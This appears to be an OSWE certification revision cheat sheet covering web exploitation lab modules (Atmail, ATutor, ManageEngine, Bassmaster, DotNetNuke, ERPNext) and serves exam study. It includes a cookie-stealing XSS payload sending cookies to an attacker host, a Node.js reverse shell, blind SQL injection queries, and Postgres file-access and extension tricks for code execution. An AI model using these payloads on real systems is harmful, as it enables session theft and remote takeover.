OSWE-cheat sheet module by module short notes for quick revision for exam:
Module : Atmail (PHP):
-
Access and alert cookie (Httponly flag should be disable in set-Cookie headers)
<script>alert(document.cookie);</script> -
Run Python Server in python3
python3 -m http.server -
Embeded cookie steal payload in image tag
function addImage() {
var img = document.createElement('img');
img.src = 'http://AttackerIP:port/' + document.cookie;
document.body.appendChild(img);
}
addImage(); -
Set cookie in web developer console
javascript:void(document.cookie="cookiename=value"); -
XHR POST Request
xhr= new XMLHttpRequest()
xhr.open("POST", url, true)
xhr.send(data) -
XHR GET Request
xhr= new XMLHttpRequest()
xhr.open("GET", url, true)
xhr.send()
Module : ATutor Authentication Bypass and RCE (PHP) :
-
Enable MySQL DB logging
nano /etc/mysql/my.cnf // uncomment or add below line
[mysqld]
general_log_file = /var/log/mysql/mysql.log
general_log = 1
systemctl restart mysql //Restart MySQL
tail –f /var/log/mysql/mysql.log //Access MySQL Log -
Enable PHP verbose error
nano /etc/php5/apache2/php.ini //uncomment or add below line
#display_errors = On
systemctl restart apache2 //Restart Apache -
Print statement in PHP
echo "any message"; -
Dump information about varaible
var_dump($var); -
Serach for fiunction in code
grep -rnw "function name(" ./ --color -
Check magic quote enable
var_dump(get_magic_quotes_gpc()); /** for enable value is 1 **/ -
MYSQL query without space
mysql> select/**/1; -
Extract first character of MySql version in case of blind MySQL query
mysql> select ascii(substring((select version()),1,1))=53; /** use with "or" boolean **/ -
Create ZIp file using Python2
!/usr/bin/python
import zipfile
from cStringIO import StringIOdef build_zip():
f = StringIO()
z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
z.writestr('folder/file.txt', 'secret')
z.close()
zip = open('zip.zip','wb')
print f.getvalue()
zip.write(f.getvalue())
zip.close()build_zip()
Module : PHP Type Juggling Vulnerability :
- Configure SMTP Server
sudo python3 -m smtpd -n -c DebuggingServer 0.0.0.0:25 & /* & for run in background */
Module : ManageEngine Application Manager AMUserResourcesSyncServlet SQL(Postgres) Injection & RCE :
- web.xml determine how URLs mapped
- Tool JD-GUI use to decompile java
- Find SQL injection vulnerability using below regular expression
^.?query.?select.*? - Enable postgres logging by uncommenting below line in postgresql.conf file
log_statement = 'all' - postgre cli
psql -U username -p 15432 /* p=port, /
- Alternative of single quote(') is duble doller sign($$)
- decode string in postgres
select convert_from(decode('QVdBRQ==', 'base64'), 'utf-8'); - Using CHR and String Concatenation
SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69); - Accessing the File System in postgres
COPY <table_name> from <file_name>
COPY <table_name> to <file_name> - PostgreSQL Extensions
CREATE OR REPLACE FUNCTION test(text) RETURNS void AS 'FILENAME', 'test' LANGUAGE 'C' STRICT;
Module : The Bassmaster Plugin (Nodejs) :
- JavaScript reverse shell
var net = require("net"), sh = require("child_process").exec("/bin/bash");
var client = new net.Socket();
client.connect(53, "attackerip",
function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
sh.stderr.pipe(client);});
Module : DotNetNuke Cookie Deserialization RCE
- XmlSerializer Limitations
XmlSerializer is only able to serialize public properties and fields of an object. - For better debugging experirence modify the debugging dll in dnSpy tool
[assembly: Debuggable(DebuggableAttribute.DebuggingModes.Default | DebuggableAttribute.DebuggingModes.DisableOptimizations | DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints | DebuggableAttribute.DebuggingModes.EnableEditAndContinue)] - XML Serialization & Deserialization method
XmlSerializer.serialize() and XmlSerializer.deserialize(reader) - Java Serialization & Deserialization method
Deserialization : inputObjectStream.readObject() and Serialization: outputObjectStream.writeObject()
Module : ERPNext Authentication Bypass and Server Side Template Injection :
- Run SMTP Server on Kali
sudo python3 -m smtpd -n -c DebuggingServer 0.0.0.0:25